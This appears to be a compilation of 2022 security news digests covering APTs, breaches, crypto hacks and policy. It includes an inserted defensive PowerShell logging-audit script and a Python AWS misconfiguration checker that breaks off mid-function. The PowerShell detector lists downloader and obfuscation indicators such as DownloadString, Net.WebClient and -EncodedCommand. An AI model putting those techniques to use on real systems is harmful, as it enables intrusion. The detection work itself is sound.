Researchers at Kaspersky have discovered an advanced persistent threat (APT) actor that is exploiting the ProxyLogon vulnerability in targeted attacks against government and military organizations in Europe and Asia. Dubbed ToddyCat, the threat actor does not appear to have ties to other known threat actors. ToddyCat uses two tools, also not seen before, that Kaspersky is calling the “Samurai backdoor” and the “Ninja Trojan.” Both tools have been deployed against compromised Exchange Servers.
- The China Chopper web shell is installed, which allows svchost to load the malicious “iiswmi.dll,” which then uses a .NET loader to execute the Samurai backdoor, which is hard to detect. The SecureList blog post includes IOCs for you to incorporate into your processes to discover this activity. Make sure your Exchange infrastructure is up to date. Given the low profile of this attack group, proactively scanning for the IOCs is a good idea.
Read more in
US critical infrastructure needs better cyber insurance coverage
A report published last week by the US Government Accountability Office (GAO) has found that critical infrastructure organizations may not receive full cyber insurance coverage, especially if incidents result in “catastrophic financial losses.”
GAO looked at cyber insurance provided by both the US private sector and the US government itself—through its Terrorism Risk Insurance Program (TRIP).
Officials said that while, in general, the cyber insurance sector provides good coverage for incidents like data breaches and ransomware attacks against most companies, critical infrastructure entities are in a sensitive spot.
First, the US government’s TRIP coverage may not kick in unless a cybersecurity incident is formally linked to an act of “terrorism,” which most likely is not going to happen since cyber-related outages must be violent or coercive in nature, to be certified as “acts of terrorism.”
Second, GAO notes that private cyber insurance providers may be able to weasel their way out of covering a particularly damaging (and expensive) attack if the incident is formally linked to an act of war, such as the acts of a state-backed threat actor.
The findings of the GAO report aren’t particularly “new” and, at this point, are common knowledge for most cybersecurity experts today. However, the report is an important step in the sometimes overly complex procedure of the US government.
In the report’s conclusion, GAO officials recommended that both Treasury and DHS officials update the US government’s response to incidents impacting critical infrastructure. This revamped response should provide better support for cybersecurity-related events and their typical fallout, such as expanding the government’s insurance coverage beyond just acts of “classic” terrorism.
Cryptocurrency bridge project Harmony said it was hacked for more than $100 million worth of cryptocurrency. The hack took place on Thursday and targeted the Harmony Protocol, a system used to interchange cryptocurrencies between different blockchains. The company is currently keeping an incident response blog post on Medium.
The US FTC fined last week the CafePress t-shirt merchandise site $500,000 for trying to cover up the severity of its 2020 data breach. The FTC said CafePress had weak security measures in place, which eventually allowed a threat actor to break in and steal the personal data of 23 million customers.
Ransomware attacks in Japan
XCarnival, a company that claims to be the first NFT assets management platform for the Metaverse, was hacked on Saturday by an unidentified threat actor who exploited its smart contracts to steal 3,087 ETH, estimated at roughly $3.8 million at the time of the heist. The company confirmed the incident in a statement on Twitter when it also paused its smart contracts. Additional details are available in this Twitter thread from blockchain security firm PeckShield, which was the one to stop the suspicious transactions.
In the aftermath of the US Supreme Court’s overturning of the Roe v Wade abortion protections, a hacktivist group known as SiegedSec has leaked data claiming to be from government employees from states that support or have already enacted abortion bans. According to early reports of users who sifted through the data, the leaked files appear to contain info from Arkansas and Kentucky, although it’s unclear if it’s newly obtained information or just recycled old leaks.
Google Analytics banned in Italy
Opera launches no-log VPN
Following in Mozilla’s footsteps, Opera Software has launched a VPN service for its users. Opera says the new VPN Pro service is complementary to its Free VPN offering, which the company has been providing to its browser users for half a decade. However, unlike its Free VPN service, which works more like a proxy, Opera says this new service is actually a “no-log” VPN with “3000+ private network servers in over 30 locations around the world.” Furthermore, VPN Pro will also be provided as a separate app and provide device-wide VPN connections and not only for the Opera browser’s traffic.
Supreme Court ruling bot activity
The US Supreme Court’s controversial ruling that rolled back Roe v. Wade abortion rights protections for US women has spurred a spike in bot and inauthentic activity on Twitter. According to Christopher Bouzy of BotSentinel, inauthentic accounts are trying to convince people angry about the decision not to vote in the upcoming US midterm elections.
More cash for CISA
US officials voted on Friday in favor of a $2.9 billion budget for the Cybersecurity and Infrastructure Security Agency (CISA). The amount allocated for CISA is $417 million more than the Biden administration requested for the DHS cyber wing, The Record reported.
New Air Force cyber chief
The Senate on Thursday confirmed Air Force Maj. Gen. Kevin Kennedy, the current US Cyber Command director of operations, as the new head of the US Air Force’s information warfare branch, the 16th Air Force (Air Forces Cyber).
Russia’s IT balkanization continues
Russian government agencies are ditching foreign video conferencing software, such as Zoom, Webex, and WhatsApp, in favor of Russian-made video conferencing tools from VK and TrueConf, Kommersant reported last week. The move comes after Russian government agencies also abandoned foreign IM apps earlier this month as well, also in favor of local alternatives.
Crowdstrike said in a report on Friday that it observed threat actors using a zero-day in Mitel MiVoice VOIP appliances as a way to gain initial access inside corporate networks for supposed ransomware attacks. The company said it reported the vulnerability (CVE-2022-29499) to Mitel, which released patches here.
Malicious Python packages
Sonatype said it discovered five malicious Python packages that contained functionality to steal AWS credentials and environment variables.
Cobalt Strike update
The Cobalt Strike adversary emulation framework received an update last week with the addition of “thread stack spoofing capabilities.” This new feature allows CS tools to bypass some AVs and EDRs that rely on thread stack inspection to determine the legitimacy of a process that is calling a function or an API.
Social engineering report
Proofpoint has an interesting report out on the most common techniques that threat actors used in social engineering attacks throughout 2021. This includes holding extended conversations with victims to build trust, using existing conversation threads between colleagues, and the use of telephone calls, since victims generally tend to believe that cyber scams usually take place via web-based communication channels only.
The operators of the LockBit ransomware have apparently launched the 3.0 version of their malware over the weekend. In addition, the group also launched a “bug bounty program” where they plan to pay for information on bugs in their encryption code, vulnerabilities in their public infrastructure, or PII data on the members of other ransomware groups.
Malware researcher Mohamed Ashraf has published a deep analysis of the Snake Keylogger, a malware strain developed in .NET. The malware includes functions to steal sensitive information from an infected device, including browser credentials, keystrokes, screenshots of a victim’s screen, and clipboard data.
Palo Alto Networks detailed on Friday the use of “API hammering” as a sandbox evasion technique. API hammering is currently used by malware strains such as Zloader and BazarLoader.
Kaspersky has published a report on the TTPs of the most common eight ransomware families, including Conti/Ryuk, Pysa, Clop (TA505), Hive, Lockbit2.0, RagnarLocker, BlackByte, and BlackCat.
Malware researcher Mohamed Ashraf has published an analysis of APT34’s Saitama Agent, a backdoor trojan that uses DNS tunneling and a finite state machine.
Vulnerabilities get patched slower and slower
DevSecOps firm Snyk has published its yearly State of Open Source Security report, and one of the company’s main findings this year was that the time it took companies to fix vulnerabilities in FOSS projects has more than doubled from 49 days in 2018 to 110 days in 2021.
Two security researchers have published a technical write-up on a vulnerability in the Oracle Fusion middleware tracked as CVE-2022–21445 but also known as the Miracle exploit. The vulnerability allows pre-auth RCE, and the researchers said that it took Oracle roughly six months to patch the issue.
A security researcher from NSFocus has published details about 11 vulnerabilities in CODESYS v2 runtime, used in many industrial products.
The NYTimes Analyzes China’s Surveillance State Plans
The NYTimes spent a year going through over 100,000 government bidding documents, and they’ve constructed a clear vision of what the government is trying to build. The plans include the combined use of cameras, DNA databases, mobile phone access, and microphones to match people’s race, ethnicities, voiceprints, clothing, vehicles, friends, social contacts, etc.—to make most public places into capture zones where they can identify and track people in multiple dimensions. Now add that to the various social credit system plans and you have tremendous leverage over the population. The only upside I see here is that these plans are so draconian, and so transparent, that it could cause many of the most talented to leave the country, and the rest of the world to ostracise China’s government. Hopefully that happens before China fully builds and implements this stuff, and starts exporting it to other would-be authoritarian regimes.
Read more in
- China’s Expanding Surveillance State: Takeaways From a NYT Investigation
- How China Is Policing the Future
BEC Attackers Starting to Impersonate Third-party Vendors
Abnormal Security says BEC attackers are more frequently switching tactics to impersonating third-party vendors and suppliers. This is a switch from mostly impersonating internal executives and other VIPs. They say third-party impersonation made up over half of attacks in May of 2022.
Read more in
Attacker Selling Access to Networks via Atlassian Vuln
An attacker is selling access to 50 different networks that he got access to via the recent Atlassian Confluence vulnerability. The actor said they were also selling access to 10,000 additional hosts that were compromised using the flaw.
Read more in
Chinese Attackers Using Ransomware to Hide Espionage
SecureWorks says Chinese attackers are more frequently using ransomware to make it appear they’re lower-level attackers going after financial gain, when their real goals are likely intellectual property. They estimated that 75% of the targets they looked at are likely interesting to China based on their location and business verticals, e.g., pharmaceuticals.
Read more in
- Chinese Threat Actor Uses Ransomware as a ‘Smokescreen’ for Espionage, by Lindsey O’Donnell-Welch (Jun 23, 2022)
2 New Cybersecurity Bills Signed Into Law
The Biden administration signed two new bills into law. The first removes red tape that will allow federal workers to share knowledge with multiple agencies. The second improves coordination between DHS and state and local governments.
Read more in
CISA’s Cloud Security Technical Reference Architecture
CISA has released its Cloud Security Technical Reference Architecture, which clarifies considerations for shared services, cloud migration, and cloud security posture management as it fulfills a key mandate in delivering on Executive Order 14028, Improving the Nation’s Cybersecurity.
Read more in
- Executive Order on Improving the Nation’s Cybersecurity
- Cloud Security Technical Reference Architecture
Automatic CAPTCHA With iOS
iOS 16 is looking to solve some of the annoyance of CAPTCHAs by transparently proving to the website that you are a real person. Yes, please. This is also within the theme of “passwordless” with its FIDO2 support of WebAuthn. I love all of it. Super happy to see the mobile phone take more of a dominant role in proving things about ourselves. I mean they know if we’re logged in with our finger or face, right? So why couldn’t they securely pass that on to a given website?
Read more in
U.S. abortion ruling reversal sparks calls for privacy laws
This week saw the U.S. Supreme Court overturn Roe v. Wade, ending guarantees that protect a person’s constitutional right to have an abortion. The ramifications are huge — economically, socially, medically, and in terms of human rights alone — for over a hundred million people living in the United States. That’s made the need for a privacy law more urgent; the U.S. is left far behind most other Western democracies, since there are reasonable fears that data — including from period trackers — can be now used as evidence against people. Tech companies have been left scrambling to figure out what the overturning of Wade means for their employees, which matters because in the U.S. healthcare is tied (inexplicably) to employment, though much of Big Tech has remained largely silent about the ruling itself (even Apple, which says “Privacy is a fundamental human right,” has said nothing.) And now there’s renewed focus on what data tech companies collect, especially in light of @motherboard’s reporting into the sale of location data that can identify people seeking abortions. As EFF’s director of cybersecurity @evacide notes, if companies don’t want their data turned into dragnets, “Don’t have it for sale. Don’t have it when a subpoena arrives.”
Read more in
- Supreme Court’s Roe v. Wade reversal sparks calls for strengthening privacy
- These 3 Supreme Court decisions could be at risk after Roe v. Wade was overturned
- Big Tech silent on data privacy in post-Roe America
Russian hackers targeting U.S. and other Ukraine allies
A report by Microsoft out this week revealed Russian state-backed hackers have attempted to infiltrate networks of more than 100 organizations in the U.S. and 42 other countries allied with Ukraine since Russia invaded in February. The list of targets includes foreign ministries of NATO states but also think tanks, IT groups and energy suppliers. Worse, the hackers successfully broke in about 30% of the time, with data stolen in one-in-four successful intrusions. Estonia was an exception — Microsoft detected “no Russian cyber intrusions” since the start of the war, largely because of its heavy reliance on cloud computing.
Read more in
- Defending Ukraine: Early Lessons from the Cyber War
- Russian hackers targeting U.S., other Ukraine allies
- Microsoft says Russia has stepped up cyber espionage against the US and Ukraine allies
- Microsoft: Russian Cyber Spying Targets 42 Ukraine Allies
Twitter apologizes for abusing user security information after $150M FTC settlement
If you saw a notice on Twitter this week about Twitter’s “use of your personal information for tailored advertising,” it’s thanks to an FTC settlement to the tune of $150 million, after Twitter was caught using information submitted by users for setting up two-factor authentication — email addresses and phone numbers — for targeted advertising. Twitter ceased the practice, and this week apologized in a blog post.
Read more in
- Twitter apologizes for abusing user security information after $150 million FTC settlement
- Twitter admits it used two-factor phone numbers and emails for serving targeted ads
- FTC Charges Twitter with Deceptively Using Account Security Data to Sell Targeted Ads
- Twitter to pay $150 million fine over deceptively collected data
- Twitter’s use of your personal information for tailored advertising
Google warns Hermit spyware is targeting iOS and Android users
An update on the recently discovered commercial-grade spyware by researchers at Lookout, dubbed Hermit, which I mentioned last week. Google has now confirmed Lookout’s findings — which were largely focused on Android. Google has also found an iOS version of the spyware, which packs in six exploits, including two zero-days. Google said that it’s notifying Android users who were targeted by the Hermit spyware, which is believed to be used by governments, and has been deployed in Kazakhstan and Italy. It’s a reminder that NSO isn’t the only spyware maker out there. Google said it’s tracking at least 30 vendors with “varying levels of sophistication and public exposure selling exploits or surveillance capabilities to government-backed actors.”
Read more in
- Google Warns of New Spyware Targeting iOS and Android Users
- Lookout Uncovers Android Spyware Deployed in Kazakhstan
- The curious tale of a fake Carrier.app
- Spyware vendor targets users in Italy and Kazakhstan
Mega says it can’t decrypt your files, a new exploit shows otherwise
Mega has long been billed as an end-to-end encrypted cloud storage provider, which claims that it can’t decrypt the data that it stores. But a new proof-of-concept exploit shows that claim isn’t exactly true. According to new research, “Mega uses to encrypt files is riddled with fundamental cryptography flaws that make it trivial for anyone with control of the platform to perform a full key recovery attack on users once they have logged in a sufficient number of times.” Mega says it’s fixed the security vulnerabilities.
Read more in
- Mega says it can’t decrypt your files. New POC exploit shows otherwise
- MEGA: MALLEABLE ENCRYPTION GOES AWRY
- MEGA Security Update
Researcher hacks into backend for network of smart Jacuzzis
A security researcher found a network of thousands of smart Jacuzzis connected to the internet via an admin panel that was leaking user data, albeit briefly, including owner’s names and email addresses. A second admin panel was also discovered after a teardown of the Android app. It took the Jacuzzi-maker more than six months to fix. Gizmodo has more, and some choice words from @dcuthbert on Jacuzzi’s poor response.
Read more in
- Hacking into the worldwide Jacuzzi SmartTub network
- Hot Tub Crime Machine: Jacuzzi Smart Tubs Left Personal Info Exposed
Strava app flaw revealed runs of Israeli officials at secret bases
A security flaw in the fitness app Strava allowed a disinformation watchdog to identify and track security personnel working at secretive bases in Israel. By uploading fake running “segments,” a user could learn the identities and past routes of others who were active in that particular area, even with the strongest privacy protections on their accounts. Case in point, some 100 individuals who exercised at six secretive Israeli bases were visible. Haaretz ($) has the original report. These latest findings come years after similar security research found that Strava’s heatmaps could identify secret bases and sensitive military installations.
Read more in
- Strava app flaw revealed runs of Israeli officials at secret bases
- Security Breach in Strava Exercise App Used to Spy on Israeli Officials, Reveals Army Bases
- Strava will refresh its heat map every month to clear it of data that recently went private
Are you a bot? Not with a PAT
A new feature in iOS 16 and macOS Ventura (out later this year) will allow Apple device owners to bypass CAPTCHAs by automatically telling apps and websites that you’re not a bot. Apple is partnering with two content delivery networks, Fastly and Cloudflare. The feature uses private access tokens — or PATs — which automatically work with any app or website that’s on Fastly and Cloudflare’s network — which is a lot of them. PATs are cross-platform, as Google, Apple, Cloudflare and Fastly all have contributed to developing this protocol. But so far, no love for Android users. Fastly’s blog post is here.
Read more in
- iOS 16 will let you bypass CAPTCHAs on some apps and websites
- Apple is introducing new tech in iOS 16 to let you skip CAPTCHAs
- Private Access Tokens: stepping into the privacy-respecting, CAPTCHA-less future we were promised
Delivery firm Yodel quiet over cyberattack
Yodel, one of the U.K.’s most widely used parcel delivery services, has been down for days, reports Bleeping Computer, after a reported “cyber incident.” No word from the company yet — ironic, for a company with that name — but later published a brief statement warning that its order tracking is unavailable and parcels “may arrive later than expected.” Not a good look for a company critical to the U.K. supply chain.
Read more in
An unknown hacker has exploited a vulnerability in U.S. crypto firm Harmony’s Horizon Bridge to steal $100 million in Ethereum. Crypto bridges allow users to send cryptocurrency and assets from one blockchain to another, but are a weak link since they are rarely audited and often built in secrecy. Harmony identified the alleged hacker in a tweet but hasn’t said exactly how the breach happened. One investor, however, warned of a potentially massive security flaw weeks earlier, pointing out that the Horizon bridge hinged on a multi-signature wallet that requires just two signatures to take the goods inside. In short, crypto startups need to be more transparent about how their technology is built and who audits it.
Read more in
- Hacker exploits Harmony blockchain bridge, loots $100M in crypto
- Hackers Steal $100 Million by Exploiting Crypto’s Weak Link
US DoE’s National Cyber-Informed Engineering Strategy
The US Department of Energy (DOE) has released its Cyber-Informed Engineering (CIE) Strategy. DoE’s publication notes that “CIE is an emerging method to integrate cybersecurity considerations into the conception, design, development, and operation of any physical system that has digital connectivity, monitoring, or control. CIE approaches use design decisions and engineering controls to mitigate or even eliminate avenues for cyber-enabled attack, or reduce the consequences when an attack occurs.” DoE’s CIE Strategy is supported by five pillars: awareness, education, development, current infrastructure, and future infrastructure.
- I’m not a big fan of the term “Cyber Informed Engineering” as it implies there is still some need for engineering that is NOT “cyber-informed.” The strategy is basically well known and proven “build security in” or “secure by design” concepts that should be integrated into all energy system operational, upgrade, and new system efforts. Given that the world’s energy systems will change quite a bit over the next 20 years, now is the time to do that.
- This is the most hopeful thing that one has heard in this space. In most industries we know what to do; we simply lack the will to do it. The energy sector is an exception. Because of the interdependencies in the grid, securing it is more complex than simply securing all the operators in the grid. Here, we need a strategic approach that goes across enterprises.
- This sprang from the 2019 National Defense Authorization Act for Fiscal Year 2020, which directed DOE to create this CIE strategy. Part of the idea is to engineer a system which is resistant to further attack once penetrated. The CIE in practice summary explains how this should be considered. Note that while this applies to critical infrastructure, there is applicability to important IT systems. Ask: if system A is compromised, what could then be reached easily, and how could you slow or stop the effectiveness of that lateral movement?
Read more in
- National Cyber-Informed Engineering Strategy (PDF)
- DOE Releases New Strategy on Cyber Engineering Systems
US, UK, New Zealand: Make Sure PowerShell is Securely Configured
Cybersecurity authorities in the UK, the US, and New Zealand have jointly released guidance urging organizations to ensure that they are using secure configurations of PowerShell, and recommending against disabling or removing the command-line tool. The guidance offers specific advice for using PowerShell to detect and reduce abuse.
- PowerShell has gotten a bit of a bad reputation. Many attackers use it to their advantage after they gain access to a system. But there are also many defensive opportunities, and this concise document does a great job in not only outlining how to restrict PowerShell but also showing how to detect malicious uses.
- PowerShell 5 should be removed in favor of version 7 for Windows 10/11 and Linux, which adds needed security features such as SSH remoting and over-the-shoulder transcription. Leverage the AMSI integration as well as application control to enable integration with anti-malware components on the endpoint and to restrict what PowerShell is permitted to do. Review the Defense document below for more on detection and properly securing PowerShell.
- This is an excellent resource and one I encourage all cybersecurity professionals to read and implement. In many of the investigations we conduct, we see PowerShell being abused by criminals.
Read more in
- NSA, CISA say: Don’t block PowerShell, here’s what to do instead
- NSA shares tips on securing Windows devices with PowerShell
- Don’t ditch PowerShell to improve security, say infosec agencies from UK, US, and NZ
- Keeping PowerShell: Security Measures to Use and Embrace (PDF)
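As an added example (not code from the joint guidance or from this newsletter), the script below audits a Windows host for the logging controls that guidance recommends, can apply them, and then queries the resulting script block log for the kind of indicators a detection team would baseline. The transcript directory and the indicator list are assumptions chosen for illustration; the registry paths are the standard Group Policy-backed locations for these settings.

```powershell
# Added example, not code from the joint guidance or this newsletter: audit (and optionally set)
# the PowerShell logging controls the "Keeping PowerShell" guidance recommends, then query the
# resulting script block log. Run in an elevated PowerShell 7 session on Windows.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Group Policy-backed registry locations for the three logging features; every value should be 1.
$Desired = @{
    'ScriptBlockLogging' = @{ EnableScriptBlockLogging = 1 }   # Event ID 4104, Microsoft-Windows-PowerShell/Operational
    'ModuleLogging'      = @{ EnableModuleLogging     = 1 }   # Event ID 4103, pipeline execution details
    'Transcription'      = @{ EnableTranscripting = 1; EnableInvocationHeader = 1 }  # over-the-shoulder transcripts
}

function Get-PSLoggingPosture {
    # Compares the live registry state and the running engine with the desired state above.
    $findings = foreach ($subKey in $Desired.Keys) {
        $path  = Join-Path $PolicyRoot $subKey
        $props = if (Test-Path $path) { Get-ItemProperty -Path $path } else { $null }
        foreach ($valueName in $Desired[$subKey].Keys) {
            $actual = if ($null -ne $props) { $props.$valueName } else { $null }
            [pscustomobject]@{
                Setting   = "$subKey\$valueName"
                Expected  = $Desired[$subKey][$valueName]
                Actual    = $actual
                Compliant = ($actual -eq $Desired[$subKey][$valueName])
            }
        }
    }
    # The guidance favours PowerShell 7 and, where application control enforces it, Constrained Language Mode.
    $findings += [pscustomobject]@{
        Setting = 'PSVersion'; Expected = '7.x'
        Actual = $PSVersionTable.PSVersion.ToString()
        Compliant = ($PSVersionTable.PSVersion.Major -ge 7)
    }
    $findings += [pscustomobject]@{
        Setting = 'LanguageMode'; Expected = 'ConstrainedLanguage'
        Actual = $ExecutionContext.SessionState.LanguageMode.ToString()
        Compliant = ($ExecutionContext.SessionState.LanguageMode -eq 'ConstrainedLanguage')
    }
    $findings
}

function Set-PSLoggingPosture {
    # Applies the desired state. $TranscriptDir is an assumption: pick a location that endpoint
    # users cannot read or modify and that your log collector ships off the host.
    param([string]$TranscriptDir = 'C:\PSTranscripts')

    foreach ($subKey in $Desired.Keys) {
        $path = Join-Path $PolicyRoot $subKey
        if (-not (Test-Path $path)) { New-Item -Path $path -Force | Out-Null }
        foreach ($valueName in $Desired[$subKey].Keys) {
            Set-ItemProperty -Path $path -Name $valueName -Value $Desired[$subKey][$valueName] -Type DWord
        }
    }
    # Module logging records only the modules listed under ModuleNames; a '*' entry covers all of them.
    # The .NET API is used here because '*' is a wildcard to the registry provider cmdlets.
    $moduleNames = 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames'
    [Microsoft.Win32.Registry]::SetValue($moduleNames, '*', '*')
    Set-ItemProperty -Path (Join-Path $PolicyRoot 'Transcription') -Name OutputDirectory -Value $TranscriptDir
    if (-not (Test-Path $TranscriptDir)) { New-Item -Path $TranscriptDir -ItemType Directory | Out-Null }
}

function Find-SuspiciousScriptBlock {
    # Reads script block log events (4104) from the last $Hours hours and flags blocks containing
    # indicators commonly associated with obfuscated or downloader-style PowerShell. The indicator
    # list is an assumption for illustration; tune it against your own environment's baseline.
    param([int]$Hours = 24)
    $indicators = 'FromBase64String', '-EncodedCommand', 'Invoke-Expression', 'DownloadString',
                  'Net.WebClient', 'ExecutionPolicy Bypass'
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
                 StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $text = $_.Properties[2].Value          # ScriptBlockText is the third property of a 4104 event
        $hits = $indicators | Where-Object { $text -match [regex]::Escape($_) }
        if ($hits) {
            [pscustomobject]@{ Time = $_.TimeCreated; Indicators = ($hits -join ', ')
                               Snippet = $text.Substring(0, [Math]::Min(120, $text.Length)) }
        }
    }
}

# Report the current posture; call Set-PSLoggingPosture and Find-SuspiciousScriptBlock as needed.
Get-PSLoggingPosture | Format-Table -AutoSize
```

Script block logging records the de-obfuscated code PowerShell actually compiles, so the 4104 query sees through simple encoding even when the launching command line did not.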
Multiple Vulnerabilities in Operational Technology Devices
Researchers from Forescout’s Vedere Labs have published a report detailing 56 vulnerabilities affecting operational technology (OT) devices. The vulnerabilities affect products from 10 vendors, including Honeywell, Emerson, Motorola, Siemens, JTEKT, Bentley Nevada, Phoenix Contact, Omron, and Yokogawa. The vulnerabilities include remote code execution (RCE); denial-of-service (DoS); file/firmware/configuration manipulation; compromise of credentials; and authentication bypass.
- The sad part is not the number of the vulnerabilities, but the type of vulnerabilities. It shows how many of these OT devices controlling critical infrastructure suffer from vulnerabilities that home security systems fixed (for the most part) years ago.
- Operational Technology (OT) covers an enormous range of devices and uses. The only real common denominator is they all started out without thinking at all about “build security in” or “secure by design.” The only hope of changing that is making sure those requirements/concepts are part of procurements of new equipment – any OT items in use today have to be segmented/shielded etc.
- The guidance from Forescout, resulting from their OT:ICEFALL project, is to not wait for CVEs for your OT prior to taking actions to secure them. They have manufacturer-specific recommendations, and segmentation, monitoring, patching, and identification of vulnerabilities are a good idea across the board. Make sure that your scanning and assessment teams know how to interact with OT/ICS systems without doing harm.
Read more in
- OT:ICEFALL: 56 Vulnerabilities Caused by Insecure-by-Design Practices in OT
- Industrial Cybersecurity Alert: 56 Insecure-by-Design Flaws
- CISA warns over software flaws in industrial control systems
- Discovery of 56 OT Device Flaws Blamed on Lackluster Security Culture
- ICS Vendors Respond to OT:Icefall Vulnerabilities Impacting Critical Infrastructure
- CISA Releases Security Advisories Related to OT:ICEFALL (Insecure by Design) Report
Malware Infects Networks at Two Texas Hospitals
Two Texas hospitals have notified patients that their personal health information (PHI) may have been compromised after the organizations’ networks were infected with malware. Baptist Medical Center and Resolute Health Hospital learned of the breach in April. The potentially compromised data include Social Security numbers, health insurance information, diagnoses, and billing information.
- Looks like attackers had over 3 weeks on target, including 4 days after the malware was first detected. Not a lot of data on this one, but looks like 1.2M individuals impacted, so this is an expensive one – just the costs of offering identity theft protection are likely to exceed the proactive cost that would have avoided or minimized the damage.
- We’ve been noting the security of health devices, and focusing on segmentation, access control and updates; don’t forget the back-end systems. Ensure sufficient protections are in place not only from medical systems but also any public facing system. You say you have your IDS and WAF all set – have you verified they work? Nothing in learning mode? That someone is responding to configured alerts?
Read more in
Cloudflare Outage Due to Network Configuration Issue
An outage affecting traffic in 19 Cloudflare data centers on Tuesday, June 21, was the result of a problematic network configuration change. The outage caused some websites and services to become unavailable. The issue was resolved within 90 minutes.
- It is becoming a buzzword to call information/cybersecurity “resiliency,” but this incident is an important reminder that security is really a subset of overall reliability/resilience. While Availability has been part of the Confidentiality/Integrity/Availability triad forever, security issues generally aren’t the top driver of downtime in most organizations. It is important to plan for how IT admin code changes that crash systems or network admin config changes that cause self-inflicted denial of service storms impact your ability to continue to deliver security services.
- Even the best of us get bit by BGP changes. Cloudflare is working to make their architecture more robust and less susceptible to network configuration errors. In so doing the configuration updates to that model resulted in the same outages they wish to avoid. When successful their architecture and lessons learned can be leveraged to help others become more resistant to these issues.
Read more in
CISA Publishes Revised Version of Cloud Security Technical Reference Architecture
The US Cybersecurity and Infrastructure Security Agency (CISA) has released the second version of its Cloud Security Technical Reference Architecture (TRA), which provides guidance for federal agencies to securely migrate to cloud services. The first version of the Cloud Security TRA was published in September 2021.
- With many organisations engaging with the cloud over the past two years as a result of the pandemic, this is a good resource to use to review and ensure any migrations to the cloud your organization has undertaken were done in a secure way.
Read more in
- Cloud Security Technical Reference Architecture (PDF)
- CISA Issues Revised Cloud Security TRA
- CISA releases second version of secure cloud migration guidance for agencies
New US Cybersecurity Laws
Two US cybersecurity-related bills have been signed into law. The Federal Rotational Cyber Workforce Program Act of 2021 paves the way for IT, cybersecurity, and related workers to use their skills across multiple agencies. The State and Local Government Cybersecurity Act “fosters cybersecurity coordination between the Department of Homeland Security and state and local actors.”
- This should make it easier to work cross-agency, and while DHS and CISA have the charter and authority, this removes many barriers to success.
Read more in
- Pair of Brand-New Cybersecurity Bills Become Law
- H.R.3599 – Federal Rotational Cyber Workforce Program Act of 2021
- Neguse, Peters State And Local Government Cybersecurity Bill Heads to President’s Desk for Signature
Cyberattack May Have Set Off Israeli Air Raid Sirens
The Israeli National Cyber Directorate (INCD) suspects that a cyberattack may be responsible for air raid sirens sounding in Jerusalem and Eilat on Sunday, June 19. The affected sirens were municipal rather than military. INCD published suggested remediations for similar systems.
- While this is likely just Iran poking at Israel as part of their ongoing disputes, it’s still a good idea to make sure that you have properly secured your emergency communication systems, that access is regularly verified, to include new integrations or connections to ensure the level of security is not reduced over time. Excessive false positives, or even too much testing, will reduce their effectiveness in a true emergency.
Read more in
- Cyberattack Blamed for Setting Off Rocket Sirens in Israel
- Israeli air raid sirens triggered in possible cyberattack
CISA Warns of Hillrom Medical Device Vulnerabilities
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about two vulnerabilities affecting Hillrom Medical heart monitors. Hillrom is releasing updates to fix the hard-coded password and improper access control issues.
- Hillrom is releasing more than one patch. Note the timelines for the fixes, some due in late 2023.
Read more in
- Federal Authorities Warn of Cardio Product Security Flaws
- ICS Medical Advisory (ICSMA-22-167-01) | Hillrom Medical Device Management
Bill Would Require Regular Medical Device Security Requirement Updates from FDA
US legislators are considering a bill that would require the Food and Drug Administration (FDA) to update medical device cybersecurity requirements regularly. The Strengthening Cybersecurity for Medical Devices Act would require the FDA to review and amend premarket medical device cybersecurity guidance every two years.
Guilty Verdict in 2019 Capital One Breach
Former Amazon software engineer Paige Thompson has been found guilty of wire fraud and computer intrusion in connection with the 2019 Capital One breach. The incident resulted in the theft of payment card application data belonging to 100 million individuals. Thompson scanned for misconfigured AWS accounts and stole data from at least 30 organizations.
- The key quote is “According to the US Attorney’s office, Thompson used a tool to scan AWS accounts in search of misconfigurations.” If Capital One, and the other 29 vulnerable AWS users Thompson found with vulnerabilities, had run that tool first, damage would have been avoided. Even better would be cloud service providers routinely scanning and notifying their customers of vulnerable configurations. Amazon, Google and Microsoft seem very good at targeting advertising (for free) to *potential* cloud service customers – seems like a no-brainer for them to be able to do targeted alerts (for free) to existing customers.
Read more in
- Capital One: Convicted techie got in via ‘misconfigured’ AWS buckets
- Jury Convicts Seattle Woman in Massive Capital One Hack
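A lightweight version of the “run the tool yourself first” check the comment above calls for, as an added example (not code from the page, the court filings or any AWS tool): it reads S3 bucket policy and IAM role policy documents you have already exported (for instance with `aws s3api get-bucket-policy` and `aws iam get-role-policy`) and flags wildcard principals that no condition scopes to your own account or organization, plus `s3:*` grants on every resource. All policy documents, account IDs and bucket names below are constructed; production scanners such as AWS IAM Access Analyzer also evaluate bucket ACLs and Block Public Access settings, which this does not.

```python
"""Flag two classes of AWS misconfiguration from exported policy documents.

Added example, not code from the page or from any AWS tool. It evaluates
policy JSON you have already pulled down and never calls AWS. All sample
policies below are constructed for illustration.
"""
import json

# Condition keys that genuinely scope a "*" principal to your own account,
# organization or VPC. A wildcard principal guarded by one of these is
# "restricted", not public.
RESTRICTING_CONDITION_KEYS = {
    "aws:SourceAccount", "aws:SourceArn", "aws:SourceVpc", "aws:SourceVpce",
    "aws:PrincipalOrgID", "aws:PrincipalAccount",
}


def _as_list(value):
    """Policy JSON allows a string or a list in most fields; normalize to a list."""
    return value if isinstance(value, list) else [value]


def _principal_is_wildcard(principal):
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def _condition_restricts(condition):
    # Condition looks like {"StringEquals": {"aws:PrincipalOrgID": "o-..."}}
    return any(key in RESTRICTING_CONDITION_KEYS
               for operator in (condition or {}).values()
               for key in operator)


def public_statements(bucket_policy):
    """Return Allow statements that let anyone on the internet act on the bucket."""
    findings = []
    for st in _as_list(bucket_policy.get("Statement", [])):
        if (st.get("Effect") == "Allow"
                and _principal_is_wildcard(st.get("Principal"))
                and not _condition_restricts(st.get("Condition"))):
            findings.append({"sid": st.get("Sid", "<no Sid>"),
                             "actions": _as_list(st.get("Action", []))})
    return findings


def overbroad_iam_statements(identity_policy):
    """Return Sids of Allow statements granting s3:* (or *) on every resource.

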